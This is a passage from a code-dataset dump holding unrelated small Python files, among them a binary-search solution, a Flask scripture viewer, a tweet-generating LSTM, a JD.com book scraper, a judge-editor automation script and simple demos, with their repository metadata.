Bitwise/parallel-bitmap/NFA2Filter.py","file_name":"NFA2Filter.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"13460642953","text":"'''\n<풀이 방법>\n1) mid가 최솟값이 가능하면 탐색 범위를 높인다.\n2) 불가능하면 탐색 범위를 낮춘다.\n'''\n\ndef isPossible(between, target, n):\n i = 0\n while i < len(between):\n if between[i] < target:\n newBet = between[i]\n while newBet < target:\n if n <= 0 or i >= len(between)-1:\n return False\n i += 1\n newBet += between[i]\n n -= 1\n i += 1\n \n return True\n\ndef binarySearch(start, end, between, n):\n mid = (start + end) // 2\n result = 0\n \n while start < end:\n if isPossible(between, mid, n):\n result = max(result, mid)\n start = mid + 1\n else:\n end = mid\n \n mid = (start + end) // 2\n \n return result\n\ndef solution(distance, rocks, n):\n answer = 0\n rocks.sort()\n between = [rocks[0]]\n for i in range(1, len(rocks)):\n between.append(rocks[i] - rocks[i-1])\n between.append(distance-rocks[-1])\n \n return binarySearch(0, distance, between, n)","repo_name":"iamhge/coding_test","sub_path":"Binary_search/pro_징검다리.py","file_name":"pro_징검다리.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"5054624168","text":"############ NATIVE IMPORTS ###########################\n############ INSTALLED IMPORTS ###########################\nfrom flask import Flask, request, redirect\n############ LOCAL IMPORTS ###########################\nfrom utils import Tanakh,Quran,Kabbalah\nfrom html_templates.utils import (\n format_sentences_to_be_hidden_html,\n format_and_link_verses_for_html,\n format_sentence_for_html,\n list_options_html,\n keyword_filter_dropdown\n)\n##########################################################\nQURAN = Quran()\nTANAKH = Tanakh()\nKABBALAH = Kabbalah()\nKEYWORDS = list(set(QURAN.KEYWORDS) | set(TANAKH.KEYWORDS) | set(KABBALAH.KEYWORDS))\nwith open(\"html_templates/search.html\") as html_file:\n SEARCH_HTML = html_file.read()\nwith open(f\"html_templates/minigames/space.html\") as html_file:\n SPACE_HTML = html_file.read()\n\napp = Flask(__name__)\n\n@app.route('/')\ndef verse_of_the_minute() -> str:\n verse_key = QURAN.verse_name_for_now().replace(\":\",\"/\")\n return redirect(f\"/quran/{verse_key}\")\n\n@app.route('/quran//')\ndef display_quranic_verse(chapter:str,verse:str) -> str:\n verse_key = f\"{chapter}:{verse}\"\n if verse_key not in QURAN.VERSE_NAMES:\n return QURAN.HTML_ERROR.format(\n verse_key=verse_key,\n verse_in_arabic = \"أعوذُ بِٱللَّهِ مِنَ ٱلشَّيۡطَٰنِ ٱلرَّجِيمِ\",\n verse_audio_hafs=QURAN.AUDIO.url(\"audhubillah\",reciter=0),\n verse_audio_warsh=QURAN.AUDIO.url(\"audhubillah\",reciter=1),\n verse_audio_hamza=QURAN.AUDIO.url(\"audhubillah\",reciter=2),\n keyword_search = keyword_filter_dropdown(keywords=KEYWORDS),\n )\n next_verse_key = QURAN.get_next_verse_name(verse_key)\n previous_verse_key = QURAN.get_previous_verse_name(verse_key)\n VERSE_DATA = QURAN.get_verse_json(chapter,verse)\n related_quran_verses = QURAN.get_crossreference_quran(VERSE_DATA, top_n=5)\n related_quran_verses_linked = format_and_link_verses_for_html(\n button_text=\"Qur'an\",\n scripture=\"quran\",\n verses=related_quran_verses[1:],\n verses_to_display=map(\n QURAN.get_english_summary_via_verse_name,\n related_quran_verses[1:]\n ),\n )\n related_bible_verses = QURAN.get_crossreference_bible(VERSE_DATA, top_n=5)\n related_bible_verses_linked = format_and_link_verses_for_html(\n button_text=\"Tanakh\",\n scripture=\"tanakh\",\n verses=related_bible_verses,\n verses_to_display = map(\n TANAKH.get_english_summary_via_verse_name,\n related_bible_verses\n ),\n )\n related_kabbalah_verses = QURAN.get_crossreference_kabbalah(VERSE_DATA, top_n=5)\n related_kabbalah_verses_linked = format_and_link_verses_for_html(\n button_text=\"Kabbalah\",\n scripture=\"kabbalah\",\n verses=related_kabbalah_verses,\n verses_to_display = map(\n KABBALAH.get_english_summary_via_verse_name,\n related_kabbalah_verses\n ),\n )\n chapter_name = QURAN.get_chapter_name(chapter)\n chapter_numbers = range(1,115)\n return QURAN.HTML.format(\n chapter_names=list_options_html(\n options=QURAN.CHAPTER_NAMES,\n urls=map(\n lambda chapter_name:f\"/quran/{QURAN.CHAPTER_NAMES.index(chapter_name)+1}/1\",\n QURAN.CHAPTER_NAMES\n ),\n selected_option=chapter_name\n ),\n chapter_numbers=list_options_html(\n options=map(\n lambda number:f\"Chapter {number}\",\n chapter_numbers\n ),\n urls=map(\n lambda chapter_number:f\"/quran/{chapter_number}/1\",\n chapter_numbers\n ),\n selected_option=f\"Chapter {chapter}\"\n ),\n verse_numbers=list_options_html(\n options=map(\n lambda number:f\"Verse {number}\",\n range(1,QURAN.CHAPTER_SIZES[int(chapter)-1]+1)\n ),\n urls= map(\n lambda verse_number:f\"/quran/{chapter}/{verse_number}\",\n range(1,QURAN.CHAPTER_SIZES[int(chapter)-1]+1)\n ),\n selected_option=f\"Verse {verse}\"\n ),\n verse_audio_hafs=QURAN.AUDIO.url(verse_key,0),\n verse_audio_warsh=QURAN.AUDIO.url(verse_key,1),\n verse_audio_hamza=QURAN.AUDIO.url(verse_key,2),\n verse_in_arabic=QURAN.get_arabic(VERSE_DATA),\n verses_in_english=format_sentences_to_be_hidden_html(\n sentences=QURAN.get_english_parallel(VERSE_DATA),\n default_displayed=QURAN.DEFAULT_TRANSLATOR\n ),\n related_verses_quran=related_quran_verses_linked,\n related_verses_tanakh=related_bible_verses_linked,\n related_verses_kabbalah=related_kabbalah_verses_linked,\n next_page_url = f\"/quran/{next_verse_key.replace(':','/')}\",\n previous_page_url = f\"/quran/{previous_verse_key.replace(':','/')}\",\n keyword_search = keyword_filter_dropdown(keywords=KEYWORDS),\n )\n\n@app.route('/tanakh////')\ndef display_tanakh_verse(collection:str,book:str,chapter:str,verse:str) -> str:\n book_key = book.replace(\" \",\"%20\")\n verse_key = f\"{collection}:{book_key}:{chapter}:{verse}\"\n next_verse_key = TANAKH.get_next_verse_name(verse_key)\n previous_verse_key = TANAKH.get_previous_verse_name(verse_key)\n VERSE_DATA = TANAKH.get_verse_json(collection,book,chapter,verse)\n return TANAKH.HTML.format(\n collection = collection,\n collection_title=collection.title(),\n book=book.title(),\n chapter=chapter,\n verse=verse,\n verse_in_english=format_sentence_for_html(TANAKH.get_english(VERSE_DATA)),\n verse_in_hebrew=TANAKH.get_hebrew(VERSE_DATA),\n audio_hebrew=TANAKH.AUDIO.url(collection,book_key,chapter),\n next_page_url = f\"/tanakh/{next_verse_key.replace(':','/')}\",\n previous_page_url = f\"/tanakh/{previous_verse_key.replace(':','/')}\",\n keyword_search = keyword_filter_dropdown(keywords=KEYWORDS),\n )\n\n@app.route('/kabbalah///')\ndef display_kabbalah_verse(book:str,chapter:str,verse:str) -> str:\n book_key = book.replace(\" \",\"%20\")\n verse_key = f\"{book_key}:{chapter}:{verse}\"\n next_verse_key = KABBALAH.get_next_verse_name(verse_key)\n previous_verse_key = KABBALAH.get_previous_verse_name(verse_key)\n VERSE_DATA = KABBALAH.get_verse_json(book,chapter,verse)\n return KABBALAH.HTML.format(\n book=book.title(),\n chapter=chapter,\n verse=verse,\n verse_in_english=format_sentence_for_html(KABBALAH.get_english(VERSE_DATA)),\n verse_in_hebrew=KABBALAH.get_hebrew(VERSE_DATA),\n next_page_url = f\"/kabbalah/{next_verse_key.replace(':','/')}\",\n previous_page_url = f\"/kabbalah/{previous_verse_key.replace(':','/')}\",\n keyword_search = keyword_filter_dropdown(keywords=KEYWORDS),\n )\n\n@app.route('/search/')\ndef search(keyword:str) -> str:\n if keyword==\"naboo\":\n return SPACE_HTML\n\n quran_verses = []\n if keyword in QURAN.KEYWORDS:\n quran_verses = QURAN.KEYWORDS[keyword]\n\n tanakh_verses = []\n if keyword in TANAKH.KEYWORDS:\n tanakh_verses = TANAKH.KEYWORDS[keyword]\n \n kabbalah_verses = []\n if keyword in KABBALAH.KEYWORDS:\n kabbalah_verses = KABBALAH.KEYWORDS[keyword]\n\n return SEARCH_HTML.format(\n keyword_search = keyword_filter_dropdown(keywords=KEYWORDS),\n quran_verses=format_and_link_verses_for_html( \n button_text=f\"Qur'an ({len(quran_verses)})\",\n scripture=\"quran\",\n verses=quran_verses,\n verses_to_display = map(\n lambda _:\"\",\n quran_verses\n ),\n ),\n tanakh_verses=format_and_link_verses_for_html( \n button_text=f\"Tanakh ({len(tanakh_verses)})\", \n scripture=\"tanakh\",\n verses=tanakh_verses,\n verses_to_display = map(\n lambda _:\"\",\n tanakh_verses\n ),\n ),\n kabbalah_verses=format_and_link_verses_for_html( \n button_text=f\"Kabbalah ({len(kabbalah_verses)})\", \n scripture=\"kabbalah\",\n verses=kabbalah_verses,\n verses_to_display = map(\n lambda _:\"\",\n kabbalah_verses\n ),\n )\n )\n \n\nif __name__ == '__main__':\n app.run(threaded=True, port=5000)","repo_name":"mohammedterryjack/quran","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"8802060561","text":"from itertools import groupby\nalunos = [\n {'nome':'Daniel','nota':'A'},\n {'nome':'luana','nota':'B'},\n {'nome':'tiago','nota':'B'},\n {'nome':'gabriel','nota':'B'},\n {'nome':'joao','nota':'A'},\n {'nome':'andre','nota':'C'},\n {'nome':'manuel','nota':'A'},\n {'nome':'rose','nota':'C'},\n {'nome':'elaine','nota':'B'},\n {'nome':'wilson','nota':'B'},\n]\n\nordena = lambda item: item['nota']\nalunos.sort(key=ordena)\nalunos_agrupados = groupby(alunos, ordena)\n\nfor agrupamento, valores_agrupados in alunos_agrupados:\n print(f' Agrupamento {agrupamento}')\n\n quantidade = len(list(valores_agrupados))\n print(f'{quantidade} alunos tiraram a nota {agrupamento}')\n# Agrupamento A\n# 3 alunos tiraram a nota A\n# Agrupamento B\n# 5 alunos tiraram a nota B\n# Agrupamento C\n# 2 alunos tiraram a nota C\n","repo_name":"D-Wolter/Python3-Udemy","sub_path":"pythonProject/03al78Groupby_agrupando_valores/Groupby4.py","file_name":"Groupby4.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4668886238","text":"import numpy as np\nfrom pymeteo import constants\nfrom .. import OptionsWidget\n\nclass curved90(OptionsWidget.OptionsWidget):\n\n def __init__(self):\n super(curved90,self).__init__()\n name = 'curved90 (quartercircle)'\n variables = [ ('z_curve,top', '2000', 'm'),\n ('z_constblo', '0', 'm'),\n ('z_constabv', '6000', 'm'),\n ('u_straight,min', '7.0', 'm/s'),\n ('u_straight,max', '31.0', 'm/s'),\n ('straight,scale', '1.0', ''),\n ('u_adjust' , '0.0', 'm/s'),\n ('v_adjust' , '0.0', 'm/s') ]\n self.initUI(name, variables)\n \n def plot(self):\n # nned z, t, th, p and qv\n z = np.arange(0., 22000., 50.)\n u = np.zeros(len(z))\n v = np.zeros(len(z))\n\n # parameters\n zdep0 = self.getOption('z_constblo')\n zdep1 = self.getOption('z_curve,top')\n zdep2 = self.getOption('z_constabv')\n umax1 = self.getOption('u_straight,min')\n umax2 = self.getOption('u_straight,max')\n sf = self.getOption('straight,scale')\n cx = self.getOption('u_adjust')\n cy = self.getOption('v_adjust')\n\n for k in range(len(z)):\n if (z[k] < zdep0): #constant section\n u[k] = 0\n v[k] = 0\n elif (z[k] < zdep1): # curvature section\n a = ((z[k]-zdep0)/(zdep1-zdep0))*(np.pi/2.)\n u[k] = umax1-umax1*np.cos(a)\n v[k] = umax1*np.sin(a)\n elif (z[k] < zdep2): # straight section\n u[k] = (umax1+(z[k]-zdep1)*(umax2-umax1)/(zdep2-zdep1))\n v[k] = umax1\n u[k] = u[k]* (1 + (sf-1)*((z[k]-zdep1)/(zdep2-zdep1)))\n else: # constant section\n u[k] = umax2*sf\n v[k] = umax1\n\n u[:] = u[:] - cx\n v[:] = v[:] - cy\n\n #emit\n return (z,u,v)\n \n","repo_name":"cwebster2/pyMeteo","sub_path":"pymeteo/cm1/hodographs/curved90.py","file_name":"curved90.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"51"} +{"seq_id":"5342061549","text":"# Learn from a part of the data set (or a specific year) and predict a Trump tweet\n\nfrom cleanup import cleanup_text\nfrom cleanup import cleanup_tweets\nfrom cleanup import cleanup_for_char\nfrom modelling import modelling\nimport numpy as np\nimport pandas as pd\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.layers import LSTM\nfrom keras.utils import np_utils\n\n# ---- For running on GPU ----\n# import tensorflow as tf\n# config = tf.compat.v1.ConfigProto(gpu_options=tf.compat.v1.GPUOptions(\n# per_process_gpu_memory_fraction=0.8)\n# # device_count = {'GPU': 1}\n# )\n# config.gpu_options.allow_growth = True\n# session = tf.compat.v1.Session(config=config)\n# tf.compat.v1.keras.backend.set_session(session)\n# # import tensorflow as tf\n# # GPU_OPTIONS = tf.GPUOptions(allow_growth=True)\n# # CONFIG = tf.ConfigProto(gpu_options=GPU_OPTIONS)\n# # sess = tf.Session(config = CONFIG)\n\n# ----------------------------\n\n# Load data set\ndata = pd.read_csv('data/tweets_11-06-2020.csv')\n\nuser_year = '2020'\ndf = data[(data[\"date\"] >= user_year + '-03-01 00:00:00') &\n (data[\"date\"] <= user_year + '-03-31 23:59:59')]\n\nprint('length df:', len(df))\n\ntweet_list = cleanup_tweets(df)\nprint('length tweet_list:', len(tweet_list))\n\ntext = cleanup_for_char(' '.join(tweet_list))\n# print(text)\n\n# File_object = open(r\"File_Name\", \"Access_Mode\")\n# File_object.write(str1)\n\n# Words\nwords = text.split()\nwords_unique = sorted(list(set(words)))\nprint('length words:', len(words))\nprint('length words_unique:', len(words_unique))\n\n# Creating char mapping\ncharacters = sorted(list(set(text)))\nn_to_char = {n: char for n, char in enumerate(characters)}\nchar_to_n = {char: n for n, char in enumerate(characters)}\n# print(characters)\nprint('length unique characters:', len(characters))\n# print('n_to_char: ', n_to_char)\n# print('char_to_n: ', char_to_n)\n\n# Data pre-processing\nX_train = []\nY_target = []\nlength = len(text)\nprint('length text:', length)\nseq_length = 150\n\n\nfor i in range(0, length-seq_length, 1):\n sequence = text[i:i + seq_length]\n label = text[i + seq_length]\n X_train.append([char_to_n[char] for char in sequence])\n Y_target.append(char_to_n[label])\n\nprint('len(X_train):', len(X_train))\n\n# We need to transform the array Y into a one-hot encoded format.\nX_modified = np.reshape(X_train, (len(X_train), seq_length, 1))\nX_modified = X_modified / float(len(characters))\nY_modified = np_utils.to_categorical(Y_target)\n\nrun_model_fit = False\n\n[model, filename] = modelling(X_modified, Y_modified, run_model_fit)\n\nif filename != '':\n model.load_weights(filename)\n# else:\n# model.load_weights(\n# 'models/text_generator_gigant_700_0.2_700_0.2_700_0.2_201.h5')\n\n\nstring_mapped = [0] # X_train[99]\nprint(string_mapped)\n\nfull_string = [n_to_char[value] for value in string_mapped]\n# full_string = ['i']\nprint(full_string)\n\n# generating characters\nfor i in range(140):\n x = np.reshape(string_mapped, (1, len(string_mapped), 1))\n x = x / float(len(characters))\n\n pred_index = np.argmax(model.predict(x, verbose=0))\n seq = [n_to_char[value] for value in string_mapped]\n full_string.append(n_to_char[pred_index])\n\n string_mapped.append(pred_index)\n string_mapped = string_mapped[1:len(string_mapped)]\n\n# combining text\ntxt = \"\"\nfor char in full_string:\n txt = txt + char\nprint('txt:', txt)\n","repo_name":"jacobmolin/Trump_Tweet_Generator","sub_path":"predict_by_char.py","file_name":"predict_by_char.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"20886021990","text":"import numpy as np\nimport cv2 as cv\nimport matplotlib.pyplot as plt\n\n# read\nimg = cv.imread('box.jpg', cv.IMREAD_COLOR)\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\nimg = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n\n# threshold\nret, thresh = cv.threshold(gray, 127, 255, 0)\n\n# find contours\n# https://docs.opencv.org/master/d4/d73/tutorial_py_contours_begin.html\n# document has error\n# findContours had not changed source img and plus one return value at first\nsome, contours, hierarchy = cv.findContours(thresh, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n\n# draw all contours\ngreen = img.copy()\ncv.drawContours(green, contours, -1, (0, 255, 0), 3)\n\n# draw first contours\nred = img.copy()\ncv.drawContours(red, contours, 0, (255, 0, 0), 3)\n\n# show\nplt.subplot(2, 2, 1), plt.imshow(img, \"gray\")\nplt.subplot(2, 2, 2), plt.imshow(green, \"gray\")\nplt.subplot(2, 2, 3), plt.imshow(red, \"gray\")\nplt.show()\n","repo_name":"AlanLi7991/opencv-turtorial-notes","sub_path":"04-image/09-contours-start.py","file_name":"09-contours-start.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"11601325668","text":"import ez\nimport webbrowser\n\nsubtask_score=[]\nsubtask_case=[]\nsubtask_cnt=0\ncase_cnt=0\ntask_id=0\n\nf=open(\"j2.txt\",\"r\")\n# task_id=input(\"task_id = \")\ntask_id=f.readline().rstrip()\nprint (\"Task\",task_id)\n\ndef from_j2():\n\tglobal subtask_score,subtask_case,subtask_cnt\n\n\t# subtask_string=input(\"Distribution of subtask in J2 = \")\n\tsubtask_string=f.readline().rstrip()\n\tsubtask_split=subtask_string.split(\",\")\n\n\t# for i in subtask_split:\n\t# \tprint (i)\n\n\tsubtask_cnt=int(subtask_split[0])\n\tfor i in range(1,len(subtask_split),2):\n\t\t# print (subtask_split[i],subtask_split[i+1])\n\t\tsubtask_score.append(int(subtask_split[i]))\n\t\tsubtask_case.append(int(subtask_split[i+1]))\n\n\tglobal case_cnt\n\tfor i in subtask_case:\n\t\tcase_cnt+=i\n\tprint (\"Number of Cases:\",case_cnt)\n\ndef to_j8():\n\t#focus on the chrome window\n\tez.mouse.move(1523,714)\n\tez.mouse.click()\n\tez.time.sleep(0.5)\n\n\tez.keyboard.send(\"ctrl+t\")\n\tez.keyboard.send(\"ctrl+l\")\n\tez.time.sleep(0.5)\n\tez.keyboard.write(\"http://210.176.23.169:3000/edit-task/\" + task_id + \"/edit-data\")\n\n\t# print(\"http://210.176.23.169:3000/edit-task/\" + task_id + \"/edit-data\")\n\n\tez.keyboard.send(\"enter\")\n\tez.time.sleep(8)\n\n\t######################\n\tez.check_force_stop()\n\t######################\n\n\t#switch on subtask button\n\tfor i in range(0,12):\n\t\tez.keyboard.send(\"tab\")\n\t\tez.time.sleep(0.0001)\n\tfor i in range(0,case_cnt*3):\n\t\tez.keyboard.send(\"tab\")\n\t\tez.time.sleep(0.0001)\n\n\tez.time.sleep(2)\n\n\t######################\n\tez.check_force_stop()\n\t######################\n\n\tez.keyboard.send(\"space\")\n\n\t#move to the add subtask button\n\tfor i in range(0,5):\n\t\tez.keyboard.send(\"tab\")\n\tez.time.sleep(0.5)\n\n\t# add subtask\n\tfor i in range(0,subtask_cnt-1):\n\t\tez.keyboard.send(\"enter\")\n\tez.time.sleep(0.5)\n\n\t#input subtask information\n\tfor i in range(0,subtask_cnt*4):\n\t\tez.keyboard.send(\"shift+tab\")\n\tez.keyboard.send(\"tab\")\n\tez.time.sleep(0.5)\n\n\tpartial_sum=0\n\tfor i in range(0,subtask_cnt):\n\t\tez.keyboard.write(str(subtask_score[i]))\n\t\tez.keyboard.send(\"tab\")\n\t\tez.keyboard.send(\"tab\")\n\t\t\n\t\tez.keyboard.write(str(partial_sum) + \"-\" + str(partial_sum+subtask_case[i]-1))\n\t\tpartial_sum+=subtask_case[i]\n\n\t\tez.keyboard.send(\"tab\")\n\t\tez.keyboard.send(\"tab\")\n\n\t#save\n\tez.keyboard.send(\"enter\")\n\tez.time.sleep(0.5)\n\n\t######################\n\tez.check_force_stop()\n\t######################\n\n\t#open statement window\n\tez.mouse.move(526,1708)\n\tez.mouse.click()\n\tez.time.sleep(0.5)\n\n\tez.keyboard.send(\"ctrl+t\")\n\tez.keyboard.send(\"ctrl+l\")\n\tez.time.sleep(0.5)\n\n\tez.keyboard.write(\"http://210.176.23.169:3000/task/\" + task_id)\n\tez.keyboard.send(\"enter\")\n\tez.time.sleep(0.5)\n\n\t######################\n\tez.check_force_stop()\n\t######################\n\n\tez.keyboard.send(\"ctrl+l\")\n\tez.time.sleep(0.5)\n\tez.keyboard.write(\"http://210.176.23.169:3000/task/\" + task_id + \"#output\")\n\tez.keyboard.send(\"enter\")\n\n\t#move back to the first depend\n\tez.mouse.move(265,725)\n\tez.mouse.click()\n\n\tfor i in range(0,subtask_cnt*4):\n\t\tez.keyboard.send(\"shift+tab\")\n\tez.keyboard.send(\"tab\")\n\tez.keyboard.send(\"tab\")\n\tez.time.sleep(0.5)\n\n\t######################\n\tez.check_force_stop()\n\t######################\n\nfrom_j2()\nto_j8()\n\n# ez.mouse.drag(684,14, 684,1050, absolute=True,duration=0.25)\n# ez.mouse.double_click()","repo_name":"EagleZhen/Scripts","sub_path":"荒废/J8 transfer subtask/J8 transfer subtask.py","file_name":"J8 transfer subtask.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"7366453331","text":"from .blocks import Block\nfrom .renderers import BarRenderer, BlocksRenderer\nfrom .containers import Container\nfrom inspect import isclass\nfrom threading import Event\nfrom typing import List\n\nimport sys\n\n\nclass Scheduler(object):\n def __init__(self, stdout=sys.stdout, stderr=sys.stderr):\n self.event = Event()\n self.running = False\n self.stdout = stdout\n self.stderr = stderr\n\n def start(self, bar_renderer: BarRenderer):\n self.running = True\n while self.running:\n self.run(bar_renderer)\n self.sleep()\n\n def run(self, bar_renderer: BarRenderer):\n try:\n self.stdout.write(bar_renderer.render())\n except Exception as e:\n self.stderr.write(str(e))\n self.stderr.flush()\n self.stdout.write('\\n')\n self.stdout.flush()\n\n def sleep(self):\n self.event.wait(1)\n self.event.clear()\n\n\nclass BlocksConverter(object):\n def __init__(self, container: Container, separator=' '):\n self.container = container\n self.separator = separator\n\n def to_renderer(self, blocks: List) -> BlocksRenderer:\n blocks = self.delegate_blocks(blocks)\n return BlocksRenderer(blocks, self.separator)\n\n def delegate_blocks(self, blocks: List) -> List[Block]:\n return [self.delegate_block(block) for block in blocks]\n\n def delegate_block(self, block) -> Block:\n if isclass(block):\n if hasattr(block, '__injected__'):\n block = block(self.container)\n else:\n block = block()\n if callable(block):\n return Block(renderer=block)\n if isinstance(block, Block):\n return block\n raise TypeError('Unknown block type %s' % type(block))\n\n\n__all__ = [\n 'Block', 'BlocksRenderer', 'BarRenderer', 'Scheduler',\n 'delegate_blocks', 'delegate_block'\n]\n","repo_name":"frizz925/dotfiles-old","sub_path":".lemonbar/i3lemonbar/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4589735757","text":"import scrapy\nfrom copy import deepcopy\nfrom scrapy_splash import SplashRequest\n\n\nclass JdSpider(scrapy.Spider):\n name = 'jd'\n allowed_domains = ['jd.com']\n start_urls = ['https://pjapi.jd.com/book/sort?source=bookSort']\n headers = {\n 'Referer': 'https://book.jd.com/booksort.html'\n }\n lua_scripts = \"\"\"\n function main(splash)\n splash:go(splash.args.url)\n splash:wait(1)\n splash:runjs(\"document.getElementsByClassName('page clearfix')[0].scrollIntoView(true)\")\n splash:wait(1)\n return splash:html()\n end\n \"\"\"\n\n def start_requests(self):\n\n yield scrapy.Request(self.start_urls[0], headers=self.headers)\n\n def parse(self, response):\n html = response.body.decode()\n data = eval(html)\n item = {}\n # print(data)\n for i in data['data']:\n item['f_cate_id'] = str(int(i['fatherCategoryId']))\n item['cate_id'] = str(int(i['categoryId']))\n item['cate_name'] = i['categoryName']\n for i1 in i['sonList']:\n item['s_cate_id'] = str(int(i1['categoryId']))\n item['s_cate_name'] = i1['categoryName']\n item['s_cate_cat'] = 'https://list.jd.com/list.html?cat=' + \",\".join(\n [str(int(i['fatherCategoryId'])), str(int(i['categoryId'])), str(int(i1['categoryId']))])\n yield SplashRequest(item['s_cate_cat'],\n callback=self.parse_book_list,\n endpoint='execute',\n args={\"lua_source\": self.lua_scripts},\n # cache_args=['lua_source'],\n headers=self.headers,\n meta={'item': deepcopy(item)}\n )\n\n def parse_book_list(self, response):\n item = response.meta['item']\n div_list = response.xpath('//div[@class=\"gl-i-wrap\"]')\n for div in div_list:\n item['book_info'] = {\n 'name': div.xpath('./div[@class=\"p-name\"]/a/em/text()').extract_first(),\n 'introduction': div.xpath('./div[@class=\"p-name\"]/a/i/text()').extract_first(),\n 'author': div.xpath('./div[@class=\"p-bookdetails\"]/span[@class=\"p-bi-name\"]/a/text()').extract_first(),\n 'price': ''.join(div.xpath('./div[@class=\"p-price\"]/strong//text()').extract()).strip(),\n 'publisher': div.xpath(\n './div[@class=\"p-bookdetails\"]/span[@class=\"p-bi-store\"]/a/text()').extract_first(),\n 'publish_date': div.xpath(\n './div[@class=\"p-bookdetails\"]/span[@class=\"p-bi-date\"]/text()').extract_first(),\n # 'book_img': 'https' + div.xpath('./div[@class=\"p-img\"]/a/img/@src').extact_first(),\n 'book_url': div.xpath('./div[@class=\"p-name\"]/a/@href').extract_first()\n }\n print(item)\n # yield item\n\n # for page in range(2, 101):\n # url = response.url + '&page={}'.format(page)\n # yield scrapy.Request(url, callback=self.parse_book_list, headers=self.headers)\n","repo_name":"Jonescy/few-spiders","sub_path":"JDBooks/JDBooks/spiders/jd.py","file_name":"jd.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"43144475409","text":"A = int(input(\"첫 번째 수를 입력하세요 : \"))\nB = int(input(\"두 번째 수를 입력하세요 : \"))\n\ndef gcd (a, b):\n if a < b:\n (a, b) = (b, a)\n while b != 0:\n r = a % b\n a = b\n b = r\n return a\n\ndef gab (a, b):\n return a*b/gcd(a,b)\n\nprint (\"두 수의 최대공약수는 {}입니다.\" .format(gcd(A, B)))\nprint (\"두 수의 최소공배수는 {}입니다.\" .format(gab(A, B)))\n","repo_name":"codedu-python/produce","sub_path":"최대공약수 최소공배수 - 조윤진.py","file_name":"최대공약수 최소공배수 - 조윤진.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34239198134","text":"rock = '''\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n'''\n\npaper = '''\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n'''\n\nscissors = '''\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n'''\n\n# Main code below this line 👇\nimport random\ngame_picture = [rock, paper, scissors]\nuser_choice = int(input(\"What do you choose? Type 0 for Rock, 1 for Paper or 2 for Scissors. \"))\nif user_choice >= 3 or user_choice < 0:\n print(\"YOU TYPED A WRONG NUMBER. YOU LOOSE\")\nelse:\n print(\"You choose\")\n print(game_picture[user_choice])\n \n computer_choice = random.randint(0, 2)\n print(f\"Computer chooses:\")\n print(game_picture[computer_choice])\n\n if user_choice == 0 and computer_choice == 2:\n print(\"YOU WIN\")\n elif computer_choice == 0 and user_choice == 2:\n print(\"YOU LOOSE\")\n elif computer_choice > user_choice:\n print(\"YOU LOOSE\")\n elif user_choice > computer_choice:\n print(\"YOU WIN\")\n elif computer_choice == user_choice:\n print(\"IT'S A DRAW\")\n","repo_name":"Hemant-Gurjar/Rock-Paper-Scissors-Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"34683013279","text":"from flask import Flask\nfrom flask_smorest import Api\nfrom dotenv import load_dotenv\nfrom flask_migrate import Migrate\nimport os\n\nfrom .person import blp as PersonBlueprint\nfrom .db import db\n\n\ndef create_app(db_url=None):\n\n app = Flask(__name__)\n load_dotenv()\n\n app.config[\"PROPAGATE_EXCEPTIONS\"] = True\n app.config[\"API_TITLE\"] = \"Person CRUD REST API\"\n app.config[\"API_VERSION\"] = \"v1\"\n app.config[\"OPENAPI_VERSION\"] = \"3.0.3\"\n app.config[\"OPENAPI_URL_PREFIX\"] = \"/\"\n app.config[\"OPENAPI_SWAGGER_UI_PATH\"] = \"/swagger-ui\"\n app.config[\"OPENAPI_SWAGGER_UI_URL\"] = \"https://cdn.jsdelivr.net/npm/swagger-ui-dist/\"\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = os.getenv(\"DATABASE_URL\")\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n\n db.init_app(app)\n api = Api(app)\n migrate = Migrate(app, db)\n\n api.register_blueprint(PersonBlueprint)\n\n return app\n","repo_name":"iamprecieee/HNGx-person-crud-api","sub_path":"resources/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40437697958","text":"product_prices = [1200, 5000, 4500, 7300, 3000, 2100]\ncovid_cases = [231, 776, 331, 897, 554, 131]\nipl_team_scores = [12, 5, 8, 7, 3, 9]\n\n\ndef get_max(data):\n max = data[0]\n for idx in 